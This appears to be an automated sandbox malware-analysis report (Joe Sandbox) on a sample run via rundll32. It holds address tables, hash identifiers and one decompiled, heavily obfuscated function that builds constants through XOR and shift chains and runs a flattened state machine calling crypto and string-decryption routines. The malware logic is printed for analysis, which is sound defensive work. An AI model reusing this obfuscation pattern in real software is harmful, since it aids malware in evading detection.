                                                                                                                    0x00000000
                                                                                                                    0x00343e82
                                                                                                                    0x00343c1f
                                                                                                                    0x00343e24
                                                                                                                    0x00343e2d
                                                                                                                    0x00343e35
                                                                                                                    0x00000000
                                                                                                                    0x00343e35
                                                                                                                    0x00343c25
                                                                                                                    0x00343c2b
                                                                                                                    0x00343d2d
                                                                                                                    0x00343d33
                                                                                                                    0x00343e0e
                                                                                                                    0x00000000
                                                                                                                    0x00343e0e
                                                                                                                    0x00343d39
                                                                                                                    0x00343d3f
                                                                                                                    0x00343fef
                                                                                                                    0x00000000
                                                                                                                    0x00343fef
                                                                                                                    0x00343d45
                                                                                                                    0x00343d4b
                                                                                                                    0x00343d8c
                                                                                                                    0x00343d91
                                                                                                                    0x00343d92
                                                                                                                    0x00343d94
                                                                                                                    0x00343d9c
                                                                                                                    0x00343da3
                                                                                                                    0x00343da5
                                                                                                                    0x00343dc3
                                                                                                                    0x00343dc5
                                                                                                                    0x00343dcc
                                                                                                                    0x00343dcc
                                                                                                                    0x00343dcd
                                                                                                                    0x00343dd0
                                                                                                                    0x00343deb
                                                                                                                    0x00343df1
                                                                                                                    0x00343df2
                                                                                                                    0x00343df2
                                                                                                                    0x00343d96
                                                                                                                    0x00343d96
                                                                                                                    0x00343d96
                                                                                                                    0x00343df4
                                                                                                                    0x00343df6
                                                                                                                    0x00000000
                                                                                                                    0x00343df6
                                                                                                                    0x00343d4d
                                                                                                                    0x00343d53
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00343d60
                                                                                                                    0x00343d65
                                                                                                                    0x00343d6c
                                                                                                                    0x00000000
                                                                                                                    0x00343d6c
                                                                                                                    0x00343c31
                                                                                                                    0x00343d16
                                                                                                                    0x00343d1b
                                                                                                                    0x00343d1d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00343d23
                                                                                                                    0x00000000
                                                                                                                    0x00343d23
                                                                                                                    0x00343c37
                                                                                                                    0x00343c3d
                                                                                                                    0x00343ce0
                                                                                                                    0x00343cef
                                                                                                                    0x00343cf4
                                                                                                                    0x00343cfb
                                                                                                                    0x00343d03
                                                                                                                    0x00000000
                                                                                                                    0x00343d03
                                                                                                                    0x00343c43
                                                                                                                    0x00343c49
                                                                                                                    0x00343c9e
                                                                                                                    0x00343caa
                                                                                                                    0x00343cbe
                                                                                                                    0x00343cc4
                                                                                                                    0x00000000
                                                                                                                    0x00343cc4
                                                                                                                    0x00343c4b
                                                                                                                    0x00343c51
                                                                                                                    0x00343c81
                                                                                                                    0x00343c86
                                                                                                                    0x00000000
                                                                                                                    0x00343c86
                                                                                                                    0x00343c53
                                                                                                                    0x00343c59
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00343c63
                                                                                                                    0x00343c68
                                                                                                                    0x00343c6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00343c70
                                                                                                                    0x00000000
                                                                                                                    0x00343fad
                                                                                                                    0x00343fad
                                                                                                                    0x00343fad
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                    • API String ID: 0-2742041174
                                                                                                                    • Opcode ID: 6372f54137c253790d153d4a9b3313068cd14fc9a5abc7ea316d9e3d131886b6
                                                                                                                    • Instruction ID: 33e5bbd3d7d729d0f9f8985e35632297c24178866fffd890dd78578a282e44e8
                                                                                                                    • Opcode Fuzzy Hash: 6372f54137c253790d153d4a9b3313068cd14fc9a5abc7ea316d9e3d131886b6
                                                                                                                    • Instruction Fuzzy Hash: 6EC202715093808BD379DF25C58ABCBBBE1BB85314F11891DE5DA9B260DBB0A948CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00332BD9 Relevance: 19.4, Strings: 15, Instructions: 636COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00332BD9(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				void* _t716;
				void* _t717;
				void* _t718;
				intOrPtr _t730;
				intOrPtr _t732;
				void* _t733;
				signed int _t735;
				void* _t741;
				intOrPtr _t746;
				intOrPtr _t752;
				intOrPtr _t754;
				intOrPtr _t755;
				void* _t757;
				void* _t759;
				intOrPtr _t760;
				void* _t766;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				void* _t783;
				intOrPtr _t792;
				void* _t807;
				void* _t812;
				void* _t842;
				intOrPtr _t848;
				void* _t864;
				intOrPtr _t866;
				signed int _t867;
				void* _t868;
				void* _t873;
				signed int* _t875;
				void* _t878;

				_t875 =  &_v396;
				_v56 = 0xa0cd19;
				_t873 = 0;
				_v84 = __ecx;
				_v52 = _v52 & 0;
				_t766 = 0x41de8e2;
				_v48 = _v48 & 0;
				_v300 = 0x1109eb;
				_v300 = _v300 + 0xcb;
				_v300 = _v300 | 0xecff95c2;
				_v300 = _v300 ^ 0xa1bddbbd;
				_v252 = 0xe28eec;
				_v252 = _v252 + 0x19d6;
				_v252 = _v252 | 0xcaf404bd;
				_v252 = _v252 ^ 0xcaf6acfe;
				_v124 = 0x517500;
				_v124 = _v124 + 0x84ec;
				_v124 = _v124 ^ 0x0051f9ec;
				_v344 = 0xbde49;
				_t772 = 0x31;
				_v344 = _v344 * 0x35;
				_v344 = _v344 << 9;
				_v344 = _v344 + 0x7afe;
				_v344 = _v344 ^ 0xea0ab4fe;
				_v232 = 0xd06c4e;
				_v232 = _v232 | 0x98bd8447;
				_v232 = _v232 + 0xffff492f;
				_v232 = _v232 ^ 0x98fd357e;
				_v236 = 0xf2a19d;
				_v236 = _v236 << 8;
				_v236 = _v236 | 0xeb063d66;
				_v236 = _v236 ^ 0xfba7bd66;
				_v304 = 0x7cba75;
				_v304 = _v304 << 0x10;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 ^ 0x0005d3a8;
				_v220 = 0xced2db;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 * 0x6a;
				_v220 = _v220 ^ 0x000ab444;
				_v356 = 0x98a5e4;
				_v356 = _v356 ^ 0xdd9204f6;
				_v356 = _v356 | 0x4689a95f;
				_v356 = _v356 * 0x48;
				_v356 = _v356 ^ 0xdf47a2b8;
				_v292 = 0x99ac6b;
				_v292 = _v292 * 0x35;
				_v292 = _v292 / _t772;
				_v292 = _v292 ^ 0x00a637e1;
				_v348 = 0x8d86f8;
				_v348 = _v348 + 0x9ec9;
				_v348 = _v348 + 0xfffff441;
				_v348 = _v348 * 0x3a;
				_v348 = _v348 ^ 0x2031e474;
				_v208 = 0x39dd97;
				_v208 = _v208 << 0x10;
				_v208 = _v208 + 0x9a19;
				_v208 = _v208 ^ 0xdd979a19;
				_v100 = 0xd2197;
				_v100 = _v100 + 0x97e4;
				_v100 = _v100 ^ 0x000db95b;
				_v324 = 0x771ce;
				_v324 = _v324 << 1;
				_v324 = _v324 ^ 0x580a954c;
				_v324 = _v324 ^ 0x580cba62;
				_v352 = 0xd79a55;
				_t867 = 0x4d;
				_v352 = _v352 / _t867;
				_v352 = _v352 << 5;
				_v352 = _v352 + 0xffffa0ed;
				_v352 = _v352 ^ 0x005b1fb1;
				_v264 = 0xbc6795;
				_v264 = _v264 + 0x99f5;
				_v264 = _v264 | 0xde86e00c;
				_v264 = _v264 ^ 0xdeb9ffad;
				_v240 = 0x2649df;
				_v240 = _v240 + 0x8f57;
				_v240 = _v240 + 0xffffdcf3;
				_v240 = _v240 ^ 0x002859eb;
				_v180 = 0x284ff;
				_v180 = _v180 + 0xfffffbe4;
				_v180 = _v180 ^ 0x0004b053;
				_v248 = 0x43d81c;
				_t773 = 0x2c;
				_v248 = _v248 * 0x30;
				_v248 = _v248 + 0x77f1;
				_v248 = _v248 ^ 0x0cb65cea;
				_v164 = 0x561af9;
				_v164 = _v164 * 0x5f;
				_v164 = _v164 ^ 0x1ff767f2;
				_v172 = 0x424117;
				_v172 = _v172 / _t773;
				_v172 = _v172 ^ 0x000edcdb;
				_v336 = 0xedf003;
				_v336 = _v336 + 0xffff11da;
				_v336 = _v336 >> 2;
				_v336 = _v336 >> 9;
				_v336 = _v336 ^ 0x000c05d4;
				_v216 = 0xec53cc;
				_v216 = _v216 | 0x30e2710b;
				_v216 = _v216 * 0x1f;
				_v216 = _v216 ^ 0xeced0588;
				_v224 = 0xc36dcc;
				_v224 = _v224 * 0x64;
				_v224 = _v224 * 0xc;
				_v224 = _v224 ^ 0x9413d5fd;
				_v148 = 0x5fde01;
				_v148 = _v148 ^ 0x51967584;
				_v148 = _v148 ^ 0x51c7dbee;
				_v156 = 0x26546c;
				_v156 = _v156 ^ 0x8ec08bcd;
				_v156 = _v156 ^ 0x8eeee361;
				_v396 = 0x210674;
				_v396 = _v396 ^ 0xb585172f;
				_v396 = _v396 >> 9;
				_v396 = _v396 ^ 0x5fa8c9ed;
				_v396 = _v396 ^ 0x5ff25ba7;
				_v112 = 0xa4fdb5;
				_v112 = _v112 ^ 0x7ac22777;
				_v112 = _v112 ^ 0x7a606cfd;
				_v160 = 0x7fe066;
				_v160 = _v160 | 0xe6d7910f;
				_v160 = _v160 ^ 0xe6fe40a3;
				_v152 = 0xb045a1;
				_v152 = _v152 ^ 0x0733bf74;
				_v152 = _v152 ^ 0x078d93a6;
				_v384 = 0x7bd524;
				_v384 = _v384 + 0xffff236c;
				_v384 = _v384 * 0x7b;
				_v384 = _v384 + 0xffffb98b;
				_v384 = _v384 ^ 0x3b1735e1;
				_v392 = 0x61d9a1;
				_v392 = _v392 + 0xab93;
				_v392 = _v392 + 0xffff054c;
				_v392 = _v392 | 0xc62dc39c;
				_v392 = _v392 ^ 0xc661791a;
				_v376 = 0x1528d1;
				_v376 = _v376 << 8;
				_v376 = _v376 + 0xffff31a1;
				_v376 = _v376 >> 9;
				_v376 = _v376 ^ 0x000f3b72;
				_v268 = 0x199e3d;
				_v268 = _v268 ^ 0x3c18ecc0;
				_v268 = _v268 >> 0xf;
				_v268 = _v268 ^ 0x00085298;
				_v116 = 0x9d324d;
				_t774 = 0x5b;
				_v116 = _v116 * 0x35;
				_v116 = _v116 ^ 0x2088a224;
				_v144 = 0xea008e;
				_v144 = _v144 * 0x31;
				_v144 = _v144 ^ 0x2cc3d943;
				_v200 = 0xbe23d7;
				_v200 = _v200 / _t774;
				_v200 = _v200 ^ 0x0006a720;
				_v368 = 0xbc3a01;
				_v368 = _v368 >> 2;
				_v368 = _v368 << 1;
				_v368 = _v368 | 0x91e27348;
				_v368 = _v368 ^ 0x91f48308;
				_v312 = 0x81ba05;
				_v312 = _v312 ^ 0x6d6d273d;
				_v312 = _v312 + 0x9af1;
				_v312 = _v312 ^ 0x6ded9aad;
				_v320 = 0xa9a2ca;
				_v320 = _v320 / _t867;
				_t775 = 0x39;
				_v320 = _v320 / _t775;
				_v320 = _v320 ^ 0x0005ef3e;
				_v136 = 0x8e55db;
				_t776 = 0xb;
				_v136 = _v136 / _t776;
				_v136 = _v136 ^ 0x00010f6d;
				_v296 = 0x9a02a3;
				_v296 = _v296 | 0xc0bbeea6;
				_v296 = _v296 ^ 0xfebfff47;
				_v296 = _v296 ^ 0x3e0de8e7;
				_v196 = 0x628794;
				_v196 = _v196 >> 7;
				_v196 = _v196 ^ 0x00033c53;
				_v360 = 0xc75687;
				_t777 = 0x55;
				_v360 = _v360 / _t777;
				_t778 = 0x4a;
				_v360 = _v360 / _t778;
				_t779 = 0x66;
				_v360 = _v360 / _t779;
				_v360 = _v360 ^ 0x0006bc1c;
				_v288 = 0xb89ddb;
				_t780 = 0x5c;
				_v288 = _v288 * 0x7b;
				_v288 = _v288 + 0x220a;
				_v288 = _v288 ^ 0x58b2320e;
				_v108 = 0x352a49;
				_v108 = _v108 | 0x42677ea4;
				_v108 = _v108 ^ 0x427d3f06;
				_v332 = 0x1123f9;
				_v332 = _v332 + 0xfffffbdd;
				_v332 = _v332 + 0xffff8b7f;
				_v332 = _v332 | 0xcf6269e1;
				_v332 = _v332 ^ 0xcf7a63e7;
				_v192 = 0x15ba5c;
				_v192 = _v192 + 0xffff7d63;
				_v192 = _v192 ^ 0x0011de47;
				_v204 = 0xd88287;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x006fcfd9;
				_v308 = 0x394063;
				_v308 = _v308 | 0x23438f89;
				_v308 = _v308 ^ 0x95557e79;
				_v308 = _v308 ^ 0xb625da34;
				_v260 = 0x6632ca;
				_v260 = _v260 << 0xc;
				_v260 = _v260 / _t780;
				_v260 = _v260 ^ 0x011a1b64;
				_v316 = 0x1ead1d;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xe;
				_v316 = _v316 ^ 0x000acc6a;
				_v388 = 0xc01c7d;
				_v388 = _v388 >> 9;
				_v388 = _v388 | 0xa159bc3f;
				_v388 = _v388 ^ 0x1058b9c4;
				_v388 = _v388 ^ 0xb10bd724;
				_v256 = 0x2459a9;
				_v256 = _v256 + 0xffff58c0;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000386a3;
				_v340 = 0xa38d0b;
				_t781 = 0x78;
				_v340 = _v340 / _t781;
				_v340 = _v340 ^ 0x3e3bd45c;
				_v340 = _v340 + 0xf3c0;
				_v340 = _v340 ^ 0x3e3a819a;
				_v380 = 0x2dd945;
				_v380 = _v380 << 4;
				_v380 = _v380 + 0xffffb7c2;
				_v380 = _v380 << 6;
				_v380 = _v380 ^ 0xb75574a7;
				_v272 = 0xf6939e;
				_v272 = _v272 | 0x851c2f86;
				_v272 = _v272 + 0xffff0412;
				_v272 = _v272 ^ 0x85fd1a3b;
				_v188 = 0x2c17e;
				_v188 = _v188 >> 3;
				_v188 = _v188 ^ 0x000c5ae0;
				_v280 = 0xf08b81;
				_v280 = _v280 | 0x75266007;
				_v280 = _v280 ^ 0xc75f894a;
				_v280 = _v280 ^ 0xb2a4e63e;
				_v372 = 0x6f48a0;
				_v372 = _v372 << 0xa;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 | 0x5e122b7b;
				_v372 = _v372 ^ 0x5e16ce05;
				_v184 = 0x747075;
				_v184 = _v184 + 0xcea0;
				_v184 = _v184 ^ 0x007a5d3b;
				_v128 = 0x4ebeca;
				_v128 = _v128 + 0xffffee54;
				_v128 = _v128 ^ 0x004a846f;
				_v120 = 0xe78fe5;
				_t868 = 0x80c65ec;
				_v120 = _v120 + 0xffff4f7b;
				_t864 = 0xf9e92c1;
				_v120 = _v120 ^ 0x00e2ece2;
				_v276 = 0xe2917e;
				_v276 = _v276 << 6;
				_v276 = _v276 + 0xffff0dfb;
				_v276 = _v276 ^ 0x38a72339;
				_v176 = 0x1ec236;
				_v176 = _v176 ^ 0x7af5486d;
				_v176 = _v176 ^ 0x7aeb8f45;
				_v244 = 0x4d92e1;
				_t782 = 0x5f;
				_v88 = 0x20;
				_v244 = _v244 * 0x4a;
				_v244 = _v244 | 0x7c3f7c28;
				_v244 = _v244 ^ 0x7e7c1ac2;
				_v284 = 0xc8aa60;
				_v284 = _v284 + 0x32b9;
				_v284 = _v284 + 0xffff127a;
				_v284 = _v284 ^ 0x00c1b775;
				_v228 = 0x32f957;
				_v228 = _v228 << 0xa;
				_v228 = _v228 ^ 0xe304a089;
				_v228 = _v228 ^ 0x28edcf32;
				_v364 = 0x1a55e7;
				_v364 = _v364 * 0x68;
				_v364 = _v364 * 0x36;
				_v364 = _v364 ^ 0xa842ca33;
				_v364 = _v364 ^ 0xe9f59c27;
				_v168 = 0x34b570;
				_v168 = _v168 | 0x6b6928c5;
				_v168 = _v168 ^ 0x6b739674;
				_v104 = 0x8a8082;
				_v104 = _v104 * 0x3f;
				_v104 = _v104 ^ 0x2214377a;
				_v212 = 0x18307b;
				_v212 = _v212 ^ 0x4b6e1055;
				_v212 = _v212 ^ 0x41119872;
				_v212 = _v212 ^ 0x0a6c434c;
				_v132 = 0x8b3f3c;
				_v132 = _v132 << 2;
				_v132 = _v132 ^ 0x022c35f2;
				_v328 = 0x314aa5;
				_v328 = _v328 | 0xbabb419f;
				_v328 = _v328 / _t782;
				_v328 = _v328 + 0xe73f;
				_v328 = _v328 ^ 0x01f1132e;
				_v140 = 0x403514;
				_v140 = _v140 + 0xffff4e06;
				_v140 = _v140 ^ 0x0039264a;
				while(1) {
					L1:
					_t783 = 0xf0ee26a;
					_t842 = 0xbf4f028;
					_t716 = 0xc1f5c56;
					do {
						while(1) {
							L2:
							_t878 = _t766 - _t716;
							if(_t878 > 0) {
								break;
							}
							if(_t878 == 0) {
								_push(_v160);
								_push(_v112);
								_t732 = E0034DCF7(_v396, 0x331884, __eflags);
								_push(_v392);
								_t866 = _t732;
								_push(_v384);
								_t733 = E0034DCF7(_v152, 0x331924, __eflags);
								_v76 = _v124;
								_t735 = E0033CB52(_v376, _t866, _v268, _v116, _v144);
								_v68 = _v68 & 0x00000000;
								_v72 = _t866;
								_v80 = 2 + _t735 * 2;
								_v60 =  &_v80;
								_v92 = _v88;
								_v64 = 1;
								_t741 = E00338D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
								_t875 =  &(_t875[0x11]);
								__eflags = _t741 - _v304;
								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
								E0033A8B0(_v296, _t866, _v196);
								E0033A8B0(_v360, _t733, _v288);
								_t864 = 0xf9e92c1;
								goto L24;
							} else {
								if(_t766 == 0xdec32e) {
									_t746 =  *0x353dfc; // 0x0
									E00348519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E0034DCF7(_v372, 0x331904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x353dfc; // 0x0
											_t754 =  *0x353dfc; // 0x0
											_t755 =  *0x353dfc; // 0x0
											_t757 = E0034D84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E0033A8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E0034DCF7(_v108, 0x3318b4, _t882);
												_pop(_t812);
												_t760 =  *0x353dfc; // 0x0
												E00350B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E0033A8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E0034DCF7(_v324, 0x3318e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E0034DCF7(_v240, 0x331814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E00339462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E0033A8B0(_v216, _t717, _v224);
							E0033A8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
						} else {
							__eflags = _t766 - _t783;
							if(_t766 == _t783) {
								_t848 =  *0x353dfc; // 0x0
								_push(_t783);
								_push(_t783);
								_t792 = E00337FF2( *((intOrPtr*)(_t848 + 0x54)));
								_t730 =  *0x353dfc; // 0x0
								__eflags = _t792;
								_t766 =  !=  ? _t868 : _t864;
								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
								goto L1;
							} else {
								__eflags = _t766 - _t864;
								if(__eflags != 0) {
									goto L25;
								} else {
									_t646 =  &_v140; // 0x39264a
									E0033957D(_v96, _v132, _v328, _v208,  *_t646);
								}
							}
						}
						goto L20;
						L25:
					} while (_t766 != 0x1d0239b);
					goto L20;
				}
			}







































































































































                                                                                                                    0x00332bd9
                                                                                                                    0x00332bdf
                                                                                                                    0x00332bee
                                                                                                                    0x00332bf0
                                                                                                                    0x00332bf7
                                                                                                                    0x00332bfe
                                                                                                                    0x00332c03
                                                                                                                    0x00332c0a
                                                                                                                    0x00332c12
                                                                                                                    0x00332c1a
                                                                                                                    0x00332c22
                                                                                                                    0x00332c2a
                                                                                                                    0x00332c35
                                                                                                                    0x00332c40
                                                                                                                    0x00332c4b
                                                                                                                    0x00332c56
                                                                                                                    0x00332c61
                                                                                                                    0x00332c6c
                                                                                                                    0x00332c77
                                                                                                                    0x00332c88
                                                                                                                    0x00332c89
                                                                                                                    0x00332c8d
                                                                                                                    0x00332c92
                                                                                                                    0x00332c9a
                                                                                                                    0x00332ca2
                                                                                                                    0x00332cad
                                                                                                                    0x00332cb8
                                                                                                                    0x00332cc3
                                                                                                                    0x00332cce
                                                                                                                    0x00332cd9
                                                                                                                    0x00332ce1
                                                                                                                    0x00332cec
                                                                                                                    0x00332cf7
                                                                                                                    0x00332cff
                                                                                                                    0x00332d04
                                                                                                                    0x00332d09
                                                                                                                    0x00332d11
                                                                                                                    0x00332d1c
                                                                                                                    0x00332d2e
                                                                                                                    0x00332d35
                                                                                                                    0x00332d40
                                                                                                                    0x00332d48
                                                                                                                    0x00332d50
                                                                                                                    0x00332d5d
                                                                                                                    0x00332d61
                                                                                                                    0x00332d69
                                                                                                                    0x00332d76
                                                                                                                    0x00332d80
                                                                                                                    0x00332d84
                                                                                                                    0x00332d8c
                                                                                                                    0x00332d94
                                                                                                                    0x00332d9c
                                                                                                                    0x00332da9
                                                                                                                    0x00332dad
                                                                                                                    0x00332db5
                                                                                                                    0x00332dc0
                                                                                                                    0x00332dc8
                                                                                                                    0x00332dd3
                                                                                                                    0x00332dde
                                                                                                                    0x00332de9
                                                                                                                    0x00332df4
                                                                                                                    0x00332dff
                                                                                                                    0x00332e07
                                                                                                                    0x00332e0b
                                                                                                                    0x00332e13
                                                                                                                    0x00332e1d
                                                                                                                    0x00332e29
                                                                                                                    0x00332e2e
                                                                                                                    0x00332e34
                                                                                                                    0x00332e39
                                                                                                                    0x00332e41
                                                                                                                    0x00332e49
                                                                                                                    0x00332e54
                                                                                                                    0x00332e5f
                                                                                                                    0x00332e6a
                                                                                                                    0x00332e75
                                                                                                                    0x00332e80
                                                                                                                    0x00332e8b
                                                                                                                    0x00332e96
                                                                                                                    0x00332ea1
                                                                                                                    0x00332eac
                                                                                                                    0x00332eb7
                                                                                                                    0x00332ec2
                                                                                                                    0x00332ed5
                                                                                                                    0x00332ed6
                                                                                                                    0x00332edd
                                                                                                                    0x00332ee8
                                                                                                                    0x00332ef3
                                                                                                                    0x00332f06
                                                                                                                    0x00332f0d
                                                                                                                    0x00332f18
                                                                                                                    0x00332f2c
                                                                                                                    0x00332f33
                                                                                                                    0x00332f3e
                                                                                                                    0x00332f46
                                                                                                                    0x00332f4e
                                                                                                                    0x00332f53
                                                                                                                    0x00332f58
                                                                                                                    0x00332f60
                                                                                                                    0x00332f6b
                                                                                                                    0x00332f7e
                                                                                                                    0x00332f85
                                                                                                                    0x00332f90
                                                                                                                    0x00332fa3
                                                                                                                    0x00332fb2
                                                                                                                    0x00332fb9
                                                                                                                    0x00332fc4
                                                                                                                    0x00332fcf
                                                                                                                    0x00332fda
                                                                                                                    0x00332fe5
                                                                                                                    0x00332ff0
                                                                                                                    0x00332ffb
                                                                                                                    0x00333006
                                                                                                                    0x0033300e
                                                                                                                    0x00333016
                                                                                                                    0x0033301b
                                                                                                                    0x00333023
                                                                                                                    0x0033302b
                                                                                                                    0x00333036
                                                                                                                    0x00333041
                                                                                                                    0x0033304c
                                                                                                                    0x00333057
                                                                                                                    0x00333062
                                                                                                                    0x0033306d
                                                                                                                    0x00333078
                                                                                                                    0x00333083
                                                                                                                    0x0033308e
                                                                                                                    0x00333096
                                                                                                                    0x003330a3
                                                                                                                    0x003330a7
                                                                                                                    0x003330af
                                                                                                                    0x003330b7
                                                                                                                    0x003330bf
                                                                                                                    0x003330c7
                                                                                                                    0x003330cf
                                                                                                                    0x003330d7
                                                                                                                    0x003330df
                                                                                                                    0x003330e9
                                                                                                                    0x003330ee
                                                                                                                    0x003330f6
                                                                                                                    0x003330fb
                                                                                                                    0x00333103
                                                                                                                    0x0033310e
                                                                                                                    0x00333119
                                                                                                                    0x00333121
                                                                                                                    0x0033312c
                                                                                                                    0x00333141
                                                                                                                    0x00333144
                                                                                                                    0x0033314b
                                                                                                                    0x00333156
                                                                                                                    0x00333169
                                                                                                                    0x00333170
                                                                                                                    0x0033317b
                                                                                                                    0x00333191
                                                                                                                    0x00333198
                                                                                                                    0x003331a3
                                                                                                                    0x003331ab
                                                                                                                    0x003331b0
                                                                                                                    0x003331b4
                                                                                                                    0x003331bc
                                                                                                                    0x003331c4
                                                                                                                    0x003331cc
                                                                                                                    0x003331d4
                                                                                                                    0x003331dc
                                                                                                                    0x003331e4
                                                                                                                    0x003331f4
                                                                                                                    0x003331fc
                                                                                                                    0x00333201
                                                                                                                    0x00333207
                                                                                                                    0x0033320f
                                                                                                                    0x00333221
                                                                                                                    0x00333226
                                                                                                                    0x0033322f
                                                                                                                    0x0033323a
                                                                                                                    0x00333242
                                                                                                                    0x0033324a
                                                                                                                    0x00333252
                                                                                                                    0x0033325a
                                                                                                                    0x00333265
                                                                                                                    0x0033326d
                                                                                                                    0x00333278
                                                                                                                    0x00333284
                                                                                                                    0x00333289
                                                                                                                    0x00333293
                                                                                                                    0x00333298
                                                                                                                    0x003332a2
                                                                                                                    0x003332a5
                                                                                                                    0x003332a9
                                                                                                                    0x003332b1
                                                                                                                    0x003332c2
                                                                                                                    0x003332c5
                                                                                                                    0x003332cc
                                                                                                                    0x003332d7
                                                                                                                    0x003332e2
                                                                                                                    0x003332ed
                                                                                                                    0x003332f8
                                                                                                                    0x00333303
                                                                                                                    0x0033330b
                                                                                                                    0x00333313
                                                                                                                    0x0033331b
                                                                                                                    0x00333323
                                                                                                                    0x0033332b
                                                                                                                    0x00333336
                                                                                                                    0x00333341
                                                                                                                    0x0033334c
                                                                                                                    0x00333357
                                                                                                                    0x0033335e
                                                                                                                    0x00333369
                                                                                                                    0x00333371
                                                                                                                    0x00333379
                                                                                                                    0x00333381
                                                                                                                    0x00333389
                                                                                                                    0x00333394
                                                                                                                    0x003333a7
                                                                                                                    0x003333ae
                                                                                                                    0x003333b9
                                                                                                                    0x003333c1
                                                                                                                    0x003333c6
                                                                                                                    0x003333cb
                                                                                                                    0x003333d3
                                                                                                                    0x003333db
                                                                                                                    0x003333e0
